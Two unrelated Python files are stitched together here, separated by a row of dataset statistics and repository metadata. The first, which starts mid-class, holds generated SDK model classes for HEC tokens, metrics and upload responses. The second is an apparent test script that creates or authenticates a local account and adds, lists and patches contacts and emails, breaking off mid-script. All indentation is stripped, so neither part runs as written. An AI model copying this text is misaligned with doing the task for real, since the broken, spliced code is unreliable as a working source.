def sourcetype(self, sourcetype: "str"):
"""Sets the sourcetype of this HECTokenCreateResponse.
sourcetype is the default value of the sourcetype field for records collected using this token. type: string
:param sourcetype: The sourcetype of this HECTokenCreateResponse.
:type: str
"""
self._attrs["sourcetype"] = sourcetype
@property
def tenant(self) -> "str":
""" Gets the tenant of this HECTokenCreateResponse.
tenant is the tenant that this token belongs to. type: string
"""
return self._attrs.get("tenant")
@tenant.setter
def tenant(self, tenant: "str"):
"""Sets the tenant of this HECTokenCreateResponse.
tenant is the tenant that this token belongs to. type: string
:param tenant: The tenant of this HECTokenCreateResponse.
:type: str
"""
self._attrs["tenant"] = tenant
@property
def token(self) -> "str":
""" Gets the token of this HECTokenCreateResponse.
token is the token value. type: string
"""
return self._attrs.get("token")
@token.setter
def token(self, token: "str"):
"""Sets the token of this HECTokenCreateResponse.
token is the token value. type: string
:param token: The token of this HECTokenCreateResponse.
:type: str
"""
self._attrs["token"] = token
def to_dict(self):
return {k: v for (k, v) in self._attrs.items() if v is not None}
class HECTokenUpdateRequest(SSCModel):
@staticmethod
def _from_dict(model: dict) -> "HECTokenUpdateRequest":
instance = HECTokenUpdateRequest.__new__(HECTokenUpdateRequest)
instance._attrs = model
return instance
def __init__(self, ack_enabled: "bool" = None, allow_query_string_auth: "bool" = None, description: "str" = None, disabled: "bool" = None, index: "str" = None, indexes: "List[str]" = None, source: "str" = None, sourcetype: "str" = None, **extra):
"""HECTokenUpdateRequest"""
self._attrs = dict()
if ack_enabled is not None:
self._attrs["ack_enabled"] = ack_enabled
if allow_query_string_auth is not None:
self._attrs["allow_query_string_auth"] = allow_query_string_auth
if description is not None:
self._attrs["description"] = description
if disabled is not None:
self._attrs["disabled"] = disabled
if index is not None:
self._attrs["index"] = index
if indexes is not None:
self._attrs["indexes"] = indexes
if source is not None:
self._attrs["source"] = source
if sourcetype is not None:
self._attrs["sourcetype"] = sourcetype
for k, v in extra.items():
self._attrs[k] = v
@property
def ack_enabled(self) -> "bool":
""" Gets the ack_enabled of this HECTokenUpdateRequest.
ack_enabled is set to true if events sent with the auth token should support indexer acknowledgement type: *bool
"""
return self._attrs.get("ack_enabled")
@ack_enabled.setter
def ack_enabled(self, ack_enabled: "bool"):
"""Sets the ack_enabled of this HECTokenUpdateRequest.
ack_enabled is set to true if events sent with the auth token should support indexer acknowledgement type: *bool
:param ack_enabled: The ack_enabled of this HECTokenUpdateRequest.
:type: bool
"""
self._attrs["ack_enabled"] = ack_enabled
@property
def allow_query_string_auth(self) -> "bool":
""" Gets the allow_query_string_auth of this HECTokenUpdateRequest.
allow_query_string_auth is set to true if this token can be passed into the ingest endpoint's query parameter for auth type: *bool
"""
return self._attrs.get("allow_query_string_auth")
@allow_query_string_auth.setter
def allow_query_string_auth(self, allow_query_string_auth: "bool"):
"""Sets the allow_query_string_auth of this HECTokenUpdateRequest.
allow_query_string_auth is set to true if this token can be passed into the ingest endpoint's query parameter for auth type: *bool
:param allow_query_string_auth: The allow_query_string_auth of this HECTokenUpdateRequest.
:type: bool
"""
self._attrs["allow_query_string_auth"] = allow_query_string_auth
@property
def description(self) -> "str":
""" Gets the description of this HECTokenUpdateRequest.
description is an optional description of the token. type: *string
"""
return self._attrs.get("description")
@description.setter
def description(self, description: "str"):
"""Sets the description of this HECTokenUpdateRequest.
description is an optional description of the token. type: *string
:param description: The description of this HECTokenUpdateRequest.
:type: str
"""
self._attrs["description"] = description
@property
def disabled(self) -> "bool":
""" Gets the disabled of this HECTokenUpdateRequest.
disabled is set to true if this auth token has been disabled and cannot be used to send events to HECv1 type: *bool
"""
return self._attrs.get("disabled")
@disabled.setter
def disabled(self, disabled: "bool"):
"""Sets the disabled of this HECTokenUpdateRequest.
disabled is set to true if this auth token has been disabled and cannot be used to send events to HECv1 type: *bool
:param disabled: The disabled of this HECTokenUpdateRequest.
:type: bool
"""
self._attrs["disabled"] = disabled
@property
def index(self) -> "str":
""" Gets the index of this HECTokenUpdateRequest.
index is the default value of the index field for records collected using this token type: *string
"""
return self._attrs.get("index")
@index.setter
def index(self, index: "str"):
"""Sets the index of this HECTokenUpdateRequest.
index is the default value of the index field for records collected using this token type: *string
:param index: The index of this HECTokenUpdateRequest.
:type: str
"""
self._attrs["index"] = index
@property
def indexes(self) -> "List[str]":
""" Gets the indexes of this HECTokenUpdateRequest.
indexes is a list of index names that this token is allowed to send events to type: []string
"""
return self._attrs.get("indexes")
@indexes.setter
def indexes(self, indexes: "List[str]"):
"""Sets the indexes of this HECTokenUpdateRequest.
indexes is a list of index names that this token is allowed to send events to type: []string
:param indexes: The indexes of this HECTokenUpdateRequest.
:type: List[str]
"""
self._attrs["indexes"] = indexes
@property
def source(self) -> "str":
""" Gets the source of this HECTokenUpdateRequest.
source is the default value of the source field for records collected using this token type: *string
"""
return self._attrs.get("source")
@source.setter
def source(self, source: "str"):
"""Sets the source of this HECTokenUpdateRequest.
source is the default value of the source field for records collected using this token type: *string
:param source: The source of this HECTokenUpdateRequest.
:type: str
"""
self._attrs["source"] = source
@property
def sourcetype(self) -> "str":
""" Gets the sourcetype of this HECTokenUpdateRequest.
sourcetype is the default value of the sourcetype field for records collected using this token type: *string
"""
return self._attrs.get("sourcetype")
@sourcetype.setter
def sourcetype(self, sourcetype: "str"):
"""Sets the sourcetype of this HECTokenUpdateRequest.
sourcetype is the default value of the sourcetype field for records collected using this token type: *string
:param sourcetype: The sourcetype of this HECTokenUpdateRequest.
:type: str
"""
self._attrs["sourcetype"] = sourcetype
def to_dict(self):
return {k: v for (k, v) in self._attrs.items() if v is not None}
class HTTPResponse(SSCModel):
@staticmethod
def _from_dict(model: dict) -> "HTTPResponse":
instance = HTTPResponse.__new__(HTTPResponse)
instance._attrs = model
return instance
def __init__(self, code: "str" = None, details: "object" = None, message: "str" = None, **extra):
"""HTTPResponse"""
self._attrs = dict()
if code is not None:
self._attrs["code"] = code
if details is not None:
self._attrs["details"] = details
if message is not None:
self._attrs["message"] = message
for k, v in extra.items():
self._attrs[k] = v
@property
def code(self) -> "str":
""" Gets the code of this HTTPResponse.
"""
return self._attrs.get("code")
@code.setter
def code(self, code: "str"):
"""Sets the code of this HTTPResponse.
:param code: The code of this HTTPResponse.
:type: str
"""
self._attrs["code"] = code
@property
def details(self) -> "dict":
""" Gets the details of this HTTPResponse.
"""
return self._attrs.get("details")
@details.setter
def details(self, details: "dict"):
"""Sets the details of this HTTPResponse.
:param details: The details of this HTTPResponse.
:type: object
"""
self._attrs["details"] = details
@property
def message(self) -> "str":
""" Gets the message of this HTTPResponse.
"""
return self._attrs.get("message")
@message.setter
def message(self, message: "str"):
"""Sets the message of this HTTPResponse.
:param message: The message of this HTTPResponse.
:type: str
"""
self._attrs["message"] = message
def to_dict(self):
return {k: v for (k, v) in self._attrs.items() if v is not None}
class Metric(SSCModel):
@staticmethod
def _from_dict(model: dict) -> "Metric":
instance = Metric.__new__(Metric)
instance._attrs = model
return instance
def __init__(self, name: "str", dimensions: "Dict[str, str]" = None, type: "str" = None, unit: "str" = None, value: "float" = None, **extra):
"""Metric"""
self._attrs = dict()
if name is not None:
self._attrs["name"] = name
if dimensions is not None:
self._attrs["dimensions"] = dimensions
if type is not None:
self._attrs["type"] = type
if unit is not None:
self._attrs["unit"] = unit
if value is not None:
self._attrs["value"] = value
for k, v in extra.items():
self._attrs[k] = v
@property
def name(self) -> "str":
""" Gets the name of this Metric.
Name of the metric e.g. CPU, Memory etc.
"""
return self._attrs.get("name")
@name.setter
def name(self, name: "str"):
"""Sets the name of this Metric.
Name of the metric e.g. CPU, Memory etc.
:param name: The name of this Metric.
:type: str
"""
if name is None:
raise ValueError("Invalid value for `name`, must not be `None`")
self._attrs["name"] = name
@property
def dimensions(self) -> "Dict[str, str]":
""" Gets the dimensions of this Metric.
Dimensions allow metrics to be classified e.g. {\"Server\":\"nginx\", \"Region\":\"us-west-1\", ...}
"""
return self._attrs.get("dimensions")
@dimensions.setter
def dimensions(self, dimensions: "Dict[str, str]"):
"""Sets the dimensions of this Metric.
Dimensions allow metrics to be classified e.g. {\"Server\":\"nginx\", \"Region\":\"us-west-1\", ...}
:param dimensions: The dimensions of this Metric.
:type: Dict[str, str]
"""
self._attrs["dimensions"] = dimensions
@property
def type(self) -> "str":
""" Gets the type of this Metric.
Type of metric. Default is g for gauge.
"""
return self._attrs.get("type")
@type.setter
def type(self, type: "str"):
"""Sets the type of this Metric.
Type of metric. Default is g for gauge.
:param type: The type of this Metric.
:type: str
"""
self._attrs["type"] = type
@property
def unit(self) -> "str":
""" Gets the unit of this Metric.
Unit of the metric e.g. percent, megabytes, seconds etc.
"""
return self._attrs.get("unit")
@unit.setter
def unit(self, unit: "str"):
"""Sets the unit of this Metric.
Unit of the metric e.g. percent, megabytes, seconds etc.
:param unit: The unit of this Metric.
:type: str
"""
self._attrs["unit"] = unit
@property
def value(self) -> "float":
""" Gets the value of this Metric.
Value of the metric. If not specified, it will be defaulted to 0.
"""
return self._attrs.get("value")
@value.setter
def value(self, value: "float"):
"""Sets the value of this Metric.
Value of the metric. If not specified, it will be defaulted to 0.
:param value: The value of this Metric.
:type: float
"""
self._attrs["value"] = value
def to_dict(self):
return {k: v for (k, v) in self._attrs.items() if v is not None}
class MetricAttribute(SSCModel):
@staticmethod
def _from_dict(model: dict) -> "MetricAttribute":
instance = MetricAttribute.__new__(MetricAttribute)
instance._attrs = model
return instance
def __init__(self, default_dimensions: "Dict[str, str]" = None, default_type: "str" = None, default_unit: "str" = None, **extra):
"""MetricAttribute"""
self._attrs = dict()
if default_dimensions is not None:
self._attrs["defaultDimensions"] = default_dimensions
if default_type is not None:
self._attrs["defaultType"] = default_type
if default_unit is not None:
self._attrs["defaultUnit"] = default_unit
for k, v in extra.items():
self._attrs[k] = v
@property
def default_dimensions(self) -> "Dict[str, str]":
""" Gets the default_dimensions of this MetricAttribute.
Optional. If set, individual metrics inherit these dimensions and can override any and/or all of them.
"""
return self._attrs.get("defaultDimensions")
@default_dimensions.setter
def default_dimensions(self, default_dimensions: "Dict[str, str]"):
"""Sets the default_dimensions of this MetricAttribute.
Optional. If set, individual metrics inherit these dimensions and can override any and/or all of them.
:param default_dimensions: The default_dimensions of this MetricAttribute.
:type: Dict[str, str]
"""
self._attrs["defaultDimensions"] = default_dimensions
@property
def default_type(self) -> "str":
""" Gets the default_type of this MetricAttribute.
Optional. If set, individual metrics inherit this type and can optionally override.
"""
return self._attrs.get("defaultType")
@default_type.setter
def default_type(self, default_type: "str"):
"""Sets the default_type of this MetricAttribute.
Optional. If set, individual metrics inherit this type and can optionally override.
:param default_type: The default_type of this MetricAttribute.
:type: str
"""
self._attrs["defaultType"] = default_type
@property
def default_unit(self) -> "str":
""" Gets the default_unit of this MetricAttribute.
Optional. If set, individual metrics inherit this unit and can optionally override.
"""
return self._attrs.get("defaultUnit")
@default_unit.setter
def default_unit(self, default_unit: "str"):
"""Sets the default_unit of this MetricAttribute.
Optional. If set, individual metrics inherit this unit and can optionally override.
:param default_unit: The default_unit of this MetricAttribute.
:type: str
"""
self._attrs["defaultUnit"] = default_unit
def to_dict(self):
return {k: v for (k, v) in self._attrs.items() if v is not None}
class MetricEvent(SSCModel):
@staticmethod
def _from_dict(model: dict) -> "MetricEvent":
instance = MetricEvent.__new__(MetricEvent)
instance._attrs = model
return instance
def __init__(self, body: "List[Metric]", attributes: "MetricAttribute" = None, host: "str" = None, id: "str" = None, nanos: "int" = None, source: "str" = None, sourcetype: "str" = None, timestamp: "int" = None, **extra):
"""MetricEvent"""
self._attrs = dict()
if body is not None:
self._attrs["body"] = body
if attributes is not None:
self._attrs["attributes"] = attributes.to_dict()
if host is not None:
self._attrs["host"] = host
if id is not None:
self._attrs["id"] = id
if nanos is not None:
self._attrs["nanos"] = nanos
if source is not None:
self._attrs["source"] = source
if sourcetype is not None:
self._attrs["sourcetype"] = sourcetype
if timestamp is not None:
self._attrs["timestamp"] = timestamp
for k, v in extra.items():
self._attrs[k] = v
@property
def body(self) -> "List[Metric]":
""" Gets the body of this MetricEvent.
Specifies multiple related metrics e.g. Memory, CPU etc.
"""
return [Metric._from_dict(i) for i in self._attrs.get("body")]
@body.setter
def body(self, body: "List[Metric]"):
"""Sets the body of this MetricEvent.
Specifies multiple related metrics e.g. Memory, CPU etc.
:param body: The body of this MetricEvent.
:type: List[Metric]
"""
if body is None:
raise ValueError("Invalid value for `body`, must not be `None`")
self._attrs["body"] = body
@property
def attributes(self) -> "MetricAttribute":
""" Gets the attributes of this MetricEvent.
"""
return MetricAttribute._from_dict(self._attrs["attributes"])
@attributes.setter
def attributes(self, attributes: "MetricAttribute"):
"""Sets the attributes of this MetricEvent.
:param attributes: The attributes of this MetricEvent.
:type: MetricAttribute
"""
self._attrs["attributes"] = attributes.to_dict()
@property
def host(self) -> "str":
""" Gets the host of this MetricEvent.
The host value assigned to the event data. Typically, this is the hostname of the client from which you are sending data.
"""
return self._attrs.get("host")
@host.setter
def host(self, host: "str"):
"""Sets the host of this MetricEvent.
The host value assigned to the event data. Typically, this is the hostname of the client from which you are sending data.
:param host: The host of this MetricEvent.
:type: str
"""
self._attrs["host"] = host
@property
def id(self) -> "str":
""" Gets the id of this MetricEvent.
An optional ID that uniquely identifies the metric data. It is used to deduplicate the data if same data is set multiple times. If ID is not specified, it will be assigned by the system.
"""
return self._attrs.get("id")
@id.setter
def id(self, id: "str"):
"""Sets the id of this MetricEvent.
An optional ID that uniquely identifies the metric data. It is used to deduplicate the data if same data is set multiple times. If ID is not specified, it will be assigned by the system.
:param id: The id of this MetricEvent.
:type: str
"""
self._attrs["id"] = id
@property
def nanos(self) -> "int":
""" Gets the nanos of this MetricEvent.
Optional nanoseconds part of the timestamp.
"""
return self._attrs.get("nanos")
@nanos.setter
def nanos(self, nanos: "int"):
"""Sets the nanos of this MetricEvent.
Optional nanoseconds part of the timestamp.
:param nanos: The nanos of this MetricEvent.
:type: int
"""
self._attrs["nanos"] = nanos
@property
def source(self) -> "str":
""" Gets the source of this MetricEvent.
The source value to assign to the event data. For example, if you are sending data from an app that you are developing, set this key to the name of the app.
"""
return self._attrs.get("source")
@source.setter
def source(self, source: "str"):
"""Sets the source of this MetricEvent.
The source value to assign to the event data. For example, if you are sending data from an app that you are developing, set this key to the name of the app.
:param source: The source of this MetricEvent.
:type: str
"""
self._attrs["source"] = source
@property
def sourcetype(self) -> "str":
""" Gets the sourcetype of this MetricEvent.
The sourcetype value assigned to the event data.
"""
return self._attrs.get("sourcetype")
@sourcetype.setter
def sourcetype(self, sourcetype: "str"):
"""Sets the sourcetype of this MetricEvent.
The sourcetype value assigned to the event data.
:param sourcetype: The sourcetype of this MetricEvent.
:type: str
"""
self._attrs["sourcetype"] = sourcetype
@property
def timestamp(self) -> "int":
""" Gets the timestamp of this MetricEvent.
Epoch time in milliseconds.
"""
return self._attrs.get("timestamp")
@timestamp.setter
def timestamp(self, timestamp: "int"):
"""Sets the timestamp of this MetricEvent.
Epoch time in milliseconds.
:param timestamp: The timestamp of this MetricEvent.
:type: int
"""
self._attrs["timestamp"] = timestamp
def to_dict(self):
return {k: v for (k, v) in self._attrs.items() if v is not None}
class UploadSuccessResponse(SSCModel):
@staticmethod
def _from_dict(model: dict) -> "UploadSuccessResponse":
instance = UploadSuccessResponse.__new__(UploadSuccessResponse)
instance._attrs = model
return instance
def __init__(self, code: "str" = None, details: "FileUploadDetails" = None, message: "str" = None, **extra):
"""UploadSuccessResponse"""
self._attrs = dict()
if code is not None:
self._attrs["code"] = code
if details is not None:
self._attrs["details"] = details.to_dict()
if message is not None:
self._attrs["message"] = message
for k, v in extra.items():
self._attrs[k] = v
@property
def code(self) -> "str":
""" Gets the code of this UploadSuccessResponse.
"""
return self._attrs.get("code")
@code.setter
def code(self, code: "str"):
"""Sets the code of this UploadSuccessResponse.
:param code: The code of this UploadSuccessResponse.
:type: str
"""
self._attrs["code"] = code
@property
def details(self) -> "FileUploadDetails":
""" Gets the details of this UploadSuccessResponse.
"""
return FileUploadDetails._from_dict(self._attrs["details"])
@details.setter
def details(self, details: "FileUploadDetails"):
"""Sets the details of this UploadSuccessResponse.
:param details: The details of this UploadSuccessResponse.
:type: FileUploadDetails
"""
self._attrs["details"] = details.to_dict()
@property
def message(self) -> "str":
""" Gets the message of this UploadSuccessResponse.
"""
return self._attrs.get("message")
@message.setter
def message(self, message: "str"):
"""Sets the message of this UploadSuccessResponse.
:param message: The message of this UploadSuccessResponse.
:type: str
"""
self._attrs["message"] = message
def to_dict(self):
return {k: v for (k, v) in self._attrs.items() if v is not None}
| 34.964266
| 439
| 0.630716
| 8,010
| 64,579
| 4.967166
| 0.035206
| 0.062432
| 0.020811
| 0.026139
| 0.914369
| 0.890014
| 0.869254
| 0.824164
| 0.814512
| 0.811345
| 0
| 0.000513
| 0.274873
| 64,579
| 1,846
| 440
| 34.983207
| 0.849107
| 0.42119
| 0
| 0.860728
| 0
| 0
| 0.107523
| 0.011736
| 0
| 0
| 0
| 0
| 0
| 1
| 0.245922
| false
| 0
| 0.006274
| 0.015056
| 0.397742
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
62384ecd02e0d5717f7ccd3b1e70648001b4aa8a
| 31,510
|
py
|
Python
|
Account/operator_emulator/ui_emulator.py
|
fititnt/mydata-sdk
|
19d7a2ddbc3b5a05665539fbcc7f461c13793e03
|
[
"MIT"
] | null | null | null |
Account/operator_emulator/ui_emulator.py
|
fititnt/mydata-sdk
|
19d7a2ddbc3b5a05665539fbcc7f461c13793e03
|
[
"MIT"
] | 2
|
2018-04-20T23:07:01.000Z
|
2018-04-21T01:01:20.000Z
|
Account/operator_emulator/ui_emulator.py
|
fititnt/mydata-sdk--hiit
|
19d7a2ddbc3b5a05665539fbcc7f461c13793e03
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Minimum viable account - MyData Operator UI Emulator
__author__ = "Jani Yli-Kantola"
__copyright__ = "Digital Health Revolution (c) 2016"
__credits__ = ["Harri Hirvonsalo", "Aleksi Palomäki"]
__license__ = "MIT"
__version__ = "0.0.1"
__maintainer__ = "Jani Yli-Kantola"
__contact__ = "https://github.com/HIIT/mydata-stack"
__status__ = "Development"
__date__ = 12.8.2016
"""
from uuid import uuid4
import requests
import time
from requests.auth import HTTPBasicAuth
import json
request_statuses = []
account_ip = "http://127.0.0.1"
account_port = "8080"
account_host = account_ip+":"+account_port
headers = {'Content-Type': 'application/json'}
account_id = ""
particular_id = ""
contacts_id = ""
predefined_account_username = "testUser"
predefined_account_password = "Hello"
username = "example_username-" + str(uuid4())
password = "example_password"
account_template = {
"data": {
"type": "Account",
"attributes": {
'firstName': 'ExampleFirstName',
'lastName': 'ExampleLastName',
'dateOfBirth': '2010-05-14',
'email': username + '@examlpe.org',
'username': username,
'password': password,
'acceptTermsOfService': 'True'
}
}
}
particular_template_for_patch = {
"data": {
"type": "Particular",
"attributes": {
'lastname': 'NewExampleLastName'
}
}
}
contact_template = {
"data": {
"type": "Contact",
"attributes": {
'address1': 'Example address 1',
'address2': 'Example address 2',
'postalCode': '97584',
'city': 'Example city',
'state': 'Example state',
'country': 'Example country',
'type': 'Personal',
'primary': 'True'
}
}
}
contact_template_for_patch = {
"data": {
"type": "Contact",
"attributes": {
'address1': 'Example address 1',
'address2': 'Example address 2',
'postalCode': '65784',
'city': 'Example city',
'state': 'Example state',
'country': 'Example country',
'type': 'Personal',
'primary': 'False'
}
}
}
email_template = {
"data": {
"type": "Email",
"attributes": {
'email': 'erkki@example.com',
'type': 'Personal',
'primary': 'True'
}
}
}
email_template_for_patch = {
"data": {
"type": "Email",
"attributes": {
'email': 'pasi@example.org',
'type': 'School',
'primary': 'False'
}
}
}
telephone_template = {
"data": {
"type": "Telephone",
"attributes": {
'tel': '0501234567',
'type': 'Personal',
'primary': 'True'
}
}
}
telephone_template_for_patch = {
"data": {
"type": "Telephone",
"attributes": {
'tel': '+358 50 123 4567',
'type': 'School',
'primary': 'False'
}
}
}
setting_template = {
"data": {
"type": "Setting",
"attributes": {
'key': 'lang',
'value': 'fi'
}
}
}
setting_template_for_patch = {
"data": {
"type": "Setting",
"attributes": {
'key': 'lang',
'value': 'se'
}
}
}
def post(host=None, endpoint=None, headers=None, data=None):
if host is None:
raise AttributeError("Provide host as parameter")
if endpoint is None:
raise AttributeError("Provide endpoint as parameter")
if headers is None:
raise AttributeError("Provide headers as parameter")
if data is None:
raise AttributeError("Provide data as parameter")
url = host + endpoint
print("Endpoint: " + endpoint)
print("Headers: " + json.dumps(headers))
print("Payload: " + json.dumps(data))
req = requests.post(url, headers=headers, json=data)
status_code = str(req.status_code)
print ("Response status: " + str(req.status_code))
try:
response_data = json.loads(req.text)
except Exception as exp:
print(repr(exp))
print("req.text: " + repr(req.text))
response_data = repr(req.text)
return status_code, response_data
def patch(host=None, endpoint=None, headers=None, data=None):
if host is None:
raise AttributeError("Provide host as parameter")
if endpoint is None:
raise AttributeError("Provide endpoint as parameter")
if headers is None:
raise AttributeError("Provide headers as parameter")
if data is None:
raise AttributeError("Provide data as parameter")
url = host + endpoint
print("Endpoint: " + endpoint)
print("Headers: " + json.dumps(headers))
print("Payload: " + json.dumps(data))
req = requests.patch(url, headers=headers, json=data)
status_code = str(req.status_code)
print ("Response status: " + str(req.status_code))
try:
response_data = json.loads(req.text)
except Exception as exp:
print(repr(exp))
print("req.text: " + repr(req.text))
response_data = repr(req.text)
return status_code, response_data
def get(host=None, endpoint=None, headers=None, username=None, password=None):
if host is None:
raise AttributeError("Provide host as parameter")
if endpoint is None:
raise AttributeError("Provide endpoint as parameter")
if headers is None:
raise AttributeError("Provide headers as parameter")
url = host + endpoint
print("Endpoint: " + endpoint)
print("Headers: " + json.dumps(headers))
if username is not None and password is not None:
req = requests.get(url, headers=headers, auth=HTTPBasicAuth(username=username, password=password))
else:
req = requests.get(url, headers=headers)
status_code = str(req.status_code)
print ("Response status: " + str(req.status_code))
try:
response_data = json.loads(req.text)
except Exception as exp:
print(repr(exp))
print("req.text: " + repr(req.text))
response_data = repr(req.text)
return status_code, response_data
######### Actions
##################################
# Create Account and Authenticate
##################################
label = "# \n# Create Account and Authenticate \n#################################"
print(label)
request_statuses.append(label)
if not predefined_account_username and not predefined_account_password:
#
# Create Account
title = "Create Account"
print(title)
try:
account = post(host=account_host, endpoint="/api/accounts/", headers=headers, data=account_template)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + account[0] + ": " + json.dumps(account[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
account_id = str(account[1]['data'].get("id", "None"))
print ("Response " + account[0] + ": " + json.dumps(account[1]))
print ("Account ID: " + account_id)
else:
print("Using predefined account")
username = predefined_account_username
password = predefined_account_password
#
# Authenticate
print ("------------------------------------")
title = "Authenticate"
print(title)
try:
api_auth = get(host=account_host, endpoint="/api/auth/user/", headers=headers, username=username, password=password)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + api_auth[0] + ": " + json.dumps(api_auth[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
apikey = str(api_auth[1].get("Api-Key", "None"))
account_id = str(api_auth[1].get("account_id", "None"))
headers['Api-Key'] = apikey
print ("Response " + api_auth[0] + ": " + json.dumps(api_auth[1]))
print ("apikey: " + apikey)
#
# ##################################
# # PARTICULARS
# ##################################
label = "# \n# PARTICULARS \n#################################"
print(label)
request_statuses.append(label)
title = "List Particulars"
print(title)
try:
entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/particulars/", headers=headers)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
particular_id = str(entries[1]['data'][0].get("id", "None"))
print ("Response " + entries[0] + ": " + json.dumps(entries[1]))
print ("particular_id: " + particular_id)
print ("------------------------------------")
title = "One Particular"
print(title)
try:
entry = get(host=account_host, endpoint="/api/accounts/" + account_id + "/particulars/" + particular_id + "/", headers=headers)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + entry[0] + ": " + json.dumps(entry[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
print ("Response " + entry[0] + ": " + json.dumps(entry[1]))
print ("particular_id: " + str(entry[1]['data'].get("id", "None")))
print ("------------------------------------")
title = "Patch Particular"
print(title)
try:
particular_template_for_patch['data']['id'] = str(particular_id)
updated_entry = patch(host=account_host, endpoint="/api/accounts/" + account_id + "/particulars/" + particular_id + "/", headers=headers, data=particular_template_for_patch)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + updated_entry[0] + ": " + json.dumps(updated_entry[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
print ("Response " + updated_entry[0] + ": " + json.dumps(updated_entry[1]))
# ##################################
# # CONTACTS
# ##################################
label = "# \n# CONTACTS \n#################################"
print(label)
request_statuses.append(label)
title = "Add Contact"
print(title)
try:
new_entry = post(host=account_host, endpoint="/api/accounts/" + account_id + "/contacts/", headers=headers, data=contact_template)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + new_entry[0] + ": " + json.dumps(new_entry[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
print ("Response " + new_entry[0] + ": " + json.dumps(new_entry[1]))
print ("------------------------------------")
title = "List Contacts"
print(title)
try:
entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/contacts/", headers=headers)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
contacts_id = str(entries[1]['data'][0].get("id", "None"))
print ("Response " + entries[0] + ": " + json.dumps(entries[1]))
print ("contacts_id: " + contacts_id)
print ("------------------------------------")
title = "One Contact"
print(title)
try:
entry = get(host=account_host, endpoint="/api/accounts/" + account_id + "/contacts/" + contacts_id + "/", headers=headers)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_statuses.append(title + ": " + entry[0] + ": " + json.dumps(entry[1]))
print ("Response " + entry[0] + ": " + json.dumps(entry[1]))
print ("contacts_id: " + str(entry[1]['data'].get("id", "None")))
print ("------------------------------------")
title = "Patch Contact"
print(title)
try:
contact_template_for_patch['data']['id'] = str(contacts_id)
updated_entry = patch(host=account_host, endpoint="/api/accounts/" + account_id + "/contacts/" + contacts_id + "/", headers=headers, data=contact_template_for_patch)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + updated_entry[0] + ": " + json.dumps(updated_entry[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
print ("Response " + updated_entry[0] + ": " + json.dumps(updated_entry[1]))
# ##################################
# # EMAIL
# ##################################
label = "# \n# EMAIL \n#################################"
print(label)
request_statuses.append(label)
title = "Add Email"
print(title)
try:
new_entry = post(host=account_host, endpoint="/api/accounts/" + account_id + "/emails/", headers=headers, data=email_template)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + new_entry[0] + ": " + json.dumps(new_entry[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
print ("Response " + new_entry[0] + ": " + json.dumps(new_entry[1]))
print ("------------------------------------")
title = "List Emails"
print(title)
try:
entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/emails/", headers=headers)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
email_id = str(entries[1]['data'][0].get("id", "None"))
print ("Response " + entries[0] + ": " + json.dumps(entries[1]))
print ("email_id: " + email_id)
print ("------------------------------------")
title = "One Email"
print(title)
try:
entry = get(host=account_host, endpoint="/api/accounts/" + account_id + "/emails/" + email_id + "/", headers=headers)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_statuses.append(title + ": " + entry[0] + ": " + json.dumps(entry[1]))
print ("Response " + entry[0] + ": " + json.dumps(entry[1]))
print ("email_id: " + str(entry[1]['data'].get("id", "None")))
print ("------------------------------------")
title = "Patch Email"
print(title)
try:
email_template_for_patch['data']['id'] = str(email_id)
updated_entry = patch(host=account_host, endpoint="/api/accounts/" + account_id + "/emails/" + email_id + "/", headers=headers, data=email_template_for_patch)
except Exception as exp:
print(title + ": " + repr(exp))
request_response = title + ": " + repr(exp)
request_statuses.append(request_response)
raise
else:
request_response = title + ": " + updated_entry[0] + ": " + json.dumps(updated_entry[1])
print('request_response: ' + request_response)
request_statuses.append(request_response)
print ("Response " + updated_entry[0] + ": " + json.dumps(updated_entry[1]))
# ##################################
# # TELEPHONE
# ##################################
label = "# \n# TELEPHONE \n#################################"
print(label)
request_statuses.append(label)
title = "Add Telephone"
print(title)
